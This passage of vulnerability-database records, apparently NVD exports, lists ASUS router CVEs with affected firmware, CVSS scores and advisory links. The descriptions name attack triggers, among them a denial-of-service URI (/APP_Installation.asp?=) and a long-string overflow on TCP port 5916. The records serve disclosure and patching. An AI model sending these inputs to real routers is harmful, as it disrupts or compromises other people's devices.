"cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*", "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac55u_firmware:3.0.0.4.382.50276:*:*:*:*:*:*:*", "matchCriteriaId": "B442681B-A689-4BA5-8822-4E5702695C4E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac55uhp_firmware:3.0.0.4.382.50276:*:*:*:*:*:*:*", "matchCriteriaId": "0D65EFF2-CA44-4646-9426-E8B20E003B8C", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac55uhp:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C69102D-EF9E-4E84-B9FA-9049F7816E26", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac86u_firmware:3.0.0.4.384.20648:*:*:*:*:*:*:*", "matchCriteriaId": "F2B83576-E242-4B1A-889F-F92107575799", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-acrh13_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "3AFF9167-5986-44D4-B6E2-B4320B07A478", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*", "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2900_firmware:3.0.0.4.384.20648:*:*:*:*:*:*:*", "matchCriteriaId": "A36E10B1-D39D-44B7-9D01-8095D821EA53", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2640D39-F0C3-49AA-87D1-F423150FDF2E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors." }, { "lang": "es", "value": "Los routers ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13 y RT-N12 D1 con firmware anterior a 3.0.0.4.380.8228; los routers RT-AC52U B1, RT-AC1200 y RT-N600 con firmware anterior a 3.0.0.4.380.10446; los routers RT-AC55U y RT-AC55UHP con firmware anterior a 3.0.0.4.382.50276; los routers RT-AC86U y RT-AC2900 con firmware anterior a 3.0.0.4.384.20648; y posiblemente otros routers de la serie RT, permiten que atacantes remotos ejecuten c\u00f3digo arbitrario mediante vectores sin especificar." } ], "id": "CVE-2018-8826", "lastModified": "2024-11-21T04:14:23.937", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2018-04-20T20:29:00.583", "references": [ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-20" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://starlabs.sg/advisories/18-20335/ | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://starlabs.sg/advisories/18-20335/ | Exploit, Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
asus | asuswrt | 3.0.0.4.384.20308 | |
asus | gt-ac2900 | - | |
asus | gt-ac5300 | - | |
asus | gt-ax11000 | - | |
asus | rt-ac1200 | - | |
asus | rt-ac1200_v2 | - | |
asus | rt-ac1200g | - | |
asus | rt-ac1200ge | - | |
asus | rt-ac1750 | - | |
asus | rt-ac1750_b1 | - | |
asus | rt-ac1900p | - | |
asus | rt-ac3100 | - | |
asus | rt-ac3200 | - | |
asus | rt-ac51u | - | |
asus | rt-ac5300 | - | |
asus | rt-ac55u | - | |
asus | rt-ac56r | - | |
asus | rt-ac56s | - | |
asus | rt-ac56u | - | |
asus | rt-ac66r | - | |
asus | rt-ac66u | - | |
asus | rt-ac66u-b1 | - | |
asus | rt-ac66u_b1 | - | |
asus | rt-ac68p | - | |
asus | rt-ac68u | - | |
asus | rt-ac86u | - | |
asus | rt-ac87u | - | |
asus | rt-ac88u | - | |
asus | rt-acrh12 | - | |
asus | rt-acrh13 | - | |
asus | rt-ax3000 | - | |
asus | rt-ax56u | - | |
asus | rt-ax58u | - | |
asus | rt-ax88u | - | |
asus | rt-ax92u | - | |
asus | rt-g32 | - | |
asus | rt-n10\+d1 | - | |
asus | rt-n10e | - | |
asus | rt-n14u | - | |
asus | rt-n16 | - | |
asus | rt-n19 | - | |
asus | rt-n56r | - | |
asus | rt-n56u | - | |
asus | rt-n600 | - | |
asus | rt-n65u | - | |
asus | rt-n66r | - | |
asus | rt-n66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:asuswrt:3.0.0.4.384.20308:*:*:*:*:*:*:*", "matchCriteriaId": "4F4DB439-E9CC-4BA5-9A05-B51BF8DCD038", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:gt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "B581C286-7C47-42BF-8876-243285409374", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D2B9867-7DA3-4221-9148-36FD412FA993", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:gt-ax11000:-:*:*:*:*:*:*:*", "matchCriteriaId": "CC02F598-C10E-4C77-9BE9-CB3660893C5E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "80BBA2CB-3DD3-4A8F-9556-E845AFAB2043", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200g:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CF74439-AD6D-4BBB-9254-640170FE1CF3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1200ge:-:*:*:*:*:*:*:*", "matchCriteriaId": "2078161F-17EB-45EE-BCE9-C86B3860FD5C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*", "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1750_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "51FC355D-5C81-4041-B649-EB271CA55AFD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac1900p:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1E5EEF4-D19B-41D1-86B6-F2CBB745570E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*", "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*", "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*", "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*", "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*", "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*", "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*", "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*", "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*", "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*", "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. An unauthenticated user can trigger a DoS of the httpd service via the /APP_Installation.asp?= URI." }, { "lang": "es", "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Un usuario no autenticado puede desencadenar una DoS del servicio httpd por medio del URI /APP_Installation.asp?=." } ], "id": "CVE-2018-20335", "lastModified": "2024-11-21T04:01:15.650", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-03-20T01:15:22.453", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20335/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20335/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-20" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | Press/Media Coverage | |
cve@mitre.org | https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | Exploit, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers | Press/Media Coverage | |
af854a3a-2127-422b-91ae-364da2661108 | https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html | Exploit, Third Party Advisory, VDB Entry |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | - | |
asus | rt-ac66u | - | |
trendnet | tew-812dru_firmware | - | |
trendnet | tew-812dru | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FFDE31E-5C68-4DC7-9B4A-C19F1719CA91", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:trendnet:tew-812dru_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "52A912D3-05B3-4A84-A0C9-743BC059A57E", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*", "matchCriteriaId": "28DC340B-27D7-4F13-A544-E8256159C2D6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU." }, { "lang": "es", "value": "Desbordamiento de b\u00fafer en Broadcom ACSD permite a atacantes remotos ejecutar c\u00f3digo arbitrario a trav\u00e9s de una cadena larga al puerto TCP 5916. Este componente es utilizado en routers de m\u00faltiples vendedores incluyendo ASUS RT-AC66U y TRENDnet TEW-812DRU." } ], "id": "CVE-2013-4659", "lastModified": "2024-11-21T01:56:00.523", "metrics": { "cvssMetricV2": [ { "acInsufInfo": true, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2017-03-14T09:59:00.160", "references": [ { "source": "cve@mitre.org", "tags": [ "Press/Media Coverage" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Press/Media Coverage" ], "url": "http://www.linux-magazine.com/Issues/2014/161/Security-and-SOHO-Routers" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://packetstormsecurity.com/files/122562/ASUS-RT-AC66U-ACSD-Remote-Root-Buffer-Overflow.html" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-119" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | * | |
asus | rt-ac66u | - | |
asus | rt-ac68u_firmware | * | |
asus | rt-ac68u | - | |
asus | rt-ac86u_firmware | * | |
asus | rt-ac86u | - | |
asus | rt-ac88u_firmware | * | |
asus | rt-ac88u | - | |
asus | rt-ac1900_firmware | * | |
asus | rt-ac1900 | - | |
asus | rt-ac2900_firmware | * | |
asus | rt-ac2900 | - | |
asus | rt-ac3100_firmware | * | |
asus | rt-ac3100 | - | |
asus | rt-n18u_firmware | * | |
asus | rt-n18u | - | |
asus | rt-ac87u_firmware | * | |
asus | rt-ac87u | - | |
asus | rt-ac3200_firmware | * | |
asus | rt-ac3200 | - | |
asus | rt-ac5300_firmware | * | |
asus | rt-ac5300 | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE3C6A2A-0B2A-4B80-BEAA-87AE8E40A7A4", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac68u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD6D75D0-EE44-4164-89F0-E04D62E45AA9", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac86u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "96AD1247-EA76-4E9C-B992-6F3D369F7B33", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ 